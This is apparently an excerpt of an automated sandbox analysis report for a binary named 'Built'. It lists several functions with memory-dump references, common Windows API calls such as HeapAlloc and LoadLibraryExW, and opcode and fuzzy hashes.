                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction ID: 6b76e0ff4361bd17b88ad132046d82c8f01f0885ab35220bc16dd0e69b1d6e46
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0fe3e981c7cf3185d146a9a4244026f2f164e791e6f92d2a50fd94940550a020
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F31A122A2860281FF116B559B8037C3691BFA1B91F492135F95DE73DACF7CE8C18B15
                                                                                                                                                                                                                                                        Function 00007FF65E295F94 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction ID: a771bfc59f78610a09b1be8a1d5afca25e14996be5ee87d8ce3cf27fd38fb3e9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0ecc1d4814c8292f6d285d86e9f4332b8d7141ecd04c52723bb65a1ba9d936a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA114F21B1D64282EE609F119700179B264AFA5B94F486435FACCE7A9ECF3DE4804710
                                                                                                                                                                                                                                                        Function 00007FF65E2A6354 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction ID: b9db4eebd6a38d23403daf4b428746a1ddf82df7295bbbad5324463d52b7d062
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 85218072A18A4286DF618F18D74037976A0BBA4B54F289238F65DD76DDDF7DD4018B00
                                                                                                                                                                                                                                                        Function 00007FF65E2903BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                                                                                                        • Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction ID: 746715f2331bd27c1a40f8ff3ba34d05c2f53bd702c9384d50cfaf15f03364a2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E017061A0874540EE449F525B00469B6A1AFA5FE0F4C6631FE5CF3BDACF3CD8814300
                                                                                                                                                                                                                                                        Function 00007FF65E288E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FF65E289390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF65E2845F4,00000000,00007FF65E281985), ref: 00007FF65E2893C9
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00007FF65E286476,?,00007FF65E28336E), ref: 00007FF65E288EA2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharLibraryLoadMultiWide
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2592636585-0
                                                                                                                                                                                                                                                        • Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                        • Instruction ID: 03770f26c59a0bc3710876a8acdad2ff722fc836c44e7674e2d334242210af3e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0DD0C201F3824642EE54A76BBB466396252AF99BC4F8CD035FE0D83B4EDC3CC0814B00
                                                                                                                                                                                                                                                        Function 00007FF65E29D5FC Relevance: 1.3, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(?,?,?,00007FF65E290C90,?,?,?,00007FF65E2922FA,?,?,?,?,?,00007FF65E293AE9), ref: 00007FF65E29D63A
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000004.00000002.2174153535.00007FF65E281000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF65E280000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174130481.00007FF65E280000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174187963.00007FF65E2AB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174217569.00007FF65E2C1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000004.00000002.2174268007.00007FF65E2C4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_4_2_7ff65e280000_Built.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4292702814-0
                                                                                                                                                                                                                                                        • Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction ID: f5d1832e896caa1be7be3ae7a5d7a6eae82285e47200a61c388d9548037fd0e9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 47F05894F0920340FE642BB16B4127833914FA87A0F0C2730FD2EE62CEDE6CB4C0A220